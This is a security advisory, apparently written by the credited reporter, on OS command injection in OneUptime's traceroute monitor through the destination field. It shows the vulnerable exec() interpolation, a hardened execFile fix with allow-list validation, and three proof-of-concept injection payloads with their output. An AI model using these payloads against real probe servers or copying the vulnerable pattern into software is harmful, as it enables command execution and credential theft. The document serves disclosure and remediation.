Vulnerability Summary
An OS command injection vulnerability was discovered in the NetworkPathMonitor.performTraceroute() method of OneUptime. This flaw allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor's destination field.
I was credited as the reporter for this vulnerability.
Technical Details
The vulnerability exists in Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts.
The performTraceroute() method constructs a shell command by directly interpolating the user-controlled destination parameter into a string template, then executes it via child_process.exec():
// Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts
private static async performTraceroute(
  destination: string, // ← attacker-controlled
  maxHops: number,
  timeout: number,
): Promise<TraceRoute> {
  // ...
  let command: string;
  if (isWindows) {
    command = `tracert -h ${maxHops} -w ${...} ${destination}`;
  } else if (isMac) {
    command = `traceroute -m ${maxHops} -w 3 ${destination}`;
  } else {
    command = `traceroute -m ${maxHops} -w 3 ${destination}`;
  }
  const tracePromise = execAsync(command); // ← shell execution
  // ...
}
Because child_process.exec() hands the whole command string to a shell (/bin/sh -c on Linux and macOS, cmd.exe /c on Windows) rather than to traceroute directly, any shell metacharacters in destination (;, |, &&, $(), backticks, redirection) are interpreted by that shell instead of being passed to traceroute as a literal hostname. No escaping or validation is applied to destination before interpolation, so this is full command injection, not a limited argument injection.
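The following is an added example, not OneUptime's code, showing the two halves of a proper fix for this pattern: an allow-list check that only accepts an IP literal or an RFC 1123 hostname, and an execFile()-style invocation in which the destination is a single argv element rather than part of a shell string. To make the shell-versus-argv difference observable without traceroute installed, `echo` stands in for the traceroute binary. The names isSafeDestination, buildTracerouteInvocation, shellRun, argvRun, the Platform type and the timeoutMs parameter are all assumptions introduced here; timeoutMs only stands in for the Windows -w value the writeup elides.

```typescript
import { execFileSync, execSync } from "node:child_process";
import { isIP } from "node:net";

// RFC 1123 hostname: dot-separated labels of 1-63 alphanumerics or hyphens,
// no leading/trailing hyphen per label, at most 253 characters overall.
// (Assumed validation policy for this example, not OneUptime's.)
const HOSTNAME_RE =
  /^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/;

// Allow-list check: an IPv4/IPv6 literal or a syntactically valid hostname.
// Everything else (shell metacharacters, whitespace, a leading '-' that
// traceroute would parse as an option) is rejected before a process is spawned.
export function isSafeDestination(destination: string): boolean {
  if (isIP(destination) !== 0) {
    return true;
  }
  return HOSTNAME_RE.test(destination);
}

export type Platform = "windows" | "mac" | "linux";

export interface Invocation {
  file: string;
  args: string[];
}

// Hardened counterpart of the command construction in performTraceroute():
// returns a file plus argv array suitable for child_process.execFile(),
// so the destination is never concatenated into a shell command line.
export function buildTracerouteInvocation(
  destination: string,
  maxHops: number,
  platform: Platform,
  timeoutMs = 3000, // assumed stand-in for the elided Windows -w value
): Invocation {
  if (!isSafeDestination(destination)) {
    throw new Error(`refusing unsafe destination: ${JSON.stringify(destination)}`);
  }
  if (!Number.isInteger(maxHops) || maxHops < 1 || maxHops > 255) {
    throw new Error(`maxHops out of range: ${maxHops}`);
  }
  if (platform === "windows") {
    return {
      file: "tracert",
      args: ["-h", String(maxHops), "-w", String(timeoutMs), destination],
    };
  }
  // macOS and Linux use identical flags in the vulnerable code.
  return { file: "traceroute", args: ["-m", String(maxHops), "-w", "3", destination] };
}

// shellRun() mirrors the vulnerable exec() path: the interpolated string is
// handed to /bin/sh, so metacharacters in `destination` are executed.
// `echo` is a constructed stand-in for traceroute; it has no side effects.
export function shellRun(destination: string): string {
  return execSync(`echo ${destination}`, { encoding: "utf8" }).trim();
}

// argvRun() mirrors the hardened execFile() path: no shell is involved and
// the whole payload reaches the program as one literal argument.
export function argvRun(destination: string): string {
  return execFileSync("echo", [destination], { encoding: "utf8" }).trim();
}
```

With the payload `127.0.0.1; echo INJECTED`, shellRun() returns two lines (the second produced by the injected command) while argvRun() returns the payload verbatim. Keep the allow-list even after switching to execFile(): without it a destination such as `-h` is still passed straight to traceroute's option parser, and on Windows a .bat/.cmd target would still be executed through cmd.exe.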
Proof of Concept
The following payloads successfully demonstrate execution:
# Payload 1: Semicolon chaining
destination = '127.0.0.1; id'
# [stdout]: uid=501(dxleryt) gid=20(staff) ...
# Payload 2: Pipe injection
destination = '127.0.0.1 | whoami'
# [stdout]: dxleryt
# Payload 3: Subshell execution
destination = '127.0.0.1$(echo INJECTED)'
# [stderr]: traceroute: unknown host 127.0.0.1INJECTED
Impact
This allows a malicious tenant in a multi-tenant SaaS deployment to:
- Execute arbitrary commands as the Probe service user
- Read sensitive files from the Probe server (environment variables, credentials)
- Pivot to internal services
- Establish persistent backdoors